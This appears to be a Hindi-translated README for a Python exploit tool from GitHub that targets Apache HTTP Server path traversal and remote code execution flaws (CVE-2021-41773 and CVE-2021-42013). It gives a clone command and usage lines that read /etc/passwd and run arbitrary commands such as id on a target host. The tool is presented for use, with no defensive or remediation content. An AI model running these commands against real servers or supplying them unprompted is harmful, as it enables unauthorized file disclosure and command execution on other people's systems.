
Apache वेब सर्वर में ज्ञात कमजोरियों (CVE-2021-41773, CVE-2021-42013) का शोषण करने के लिए python3 में बनाया गया एक्सप्लॉइट
पायथन 3 में बनाया गया एक्सप्लॉइट जो अपाचे वेब सर्वर में ज्ञात कमजोरियों (CVE-2021-41773, CVE-2021-42013) का शोषण करता है
अपाचे HTTP सर्वर प्रोजेक्ट UNIX और Windows सहित आधुनिक ऑपरेटिंग सिस्टम के लिए एक ओपन-सोर्स HTTP सर्वर विकसित करने और बनाए रखने का एक प्रयास है। इस प्रोजेक्ट का लक्ष्य एक सुरक्षित, कुशल और विस्तारणीय सर्वर प्रदान करना है जो वर्तमान HTTP मानकों के अनुरूप HTTP सेवाएं प्रदान करता है।
बस एक git clone करें:
git clone https://github.com/0xGabe/Apache-CVEs
वांछित फ़ाइल को पढ़ने के लिए, बस फ़ाइल पथ प्रदान करें। यदि उपयोगकर्ता के पास पढ़ने की अनुमति नहीं है, तो कोई पढ़ने का परिणाम नहीं होगा।
python3 cve-2021-41773.py --url http://HOST:PORT --path /etc/passwd
लक्ष्य मशीन पर स्पेस, विशेष वर्ण या इसी तरह के कमांड को निष्पादित करने के लिए, कमांड को उद्धरण में पास करना आवश्यक है।
python3 cve-2021-41773.py --url http://HOST:PORT --cmd id
वांछित फ़ाइल को पढ़ने के लिए, बस फ़ाइल पथ प्रदान करें। यदि उपयोगकर्ता के पास पढ़ने की अनुमति नहीं है, तो कोई पढ़ने का परिणाम नहीं होगा।
python3 cve-2021-42013.py --url http://HOST:PORT --path /etc/passwd
लक्ष्य मशीन पर स्पेस, विशेष वर्ण या इसी तरह के कमांड को निष्पादित करने के लिए, कमांड को उद्धरण में पास करना आवश्यक है।
python3 cve-2021-42013.py --url http://HOST:PORT --cmd id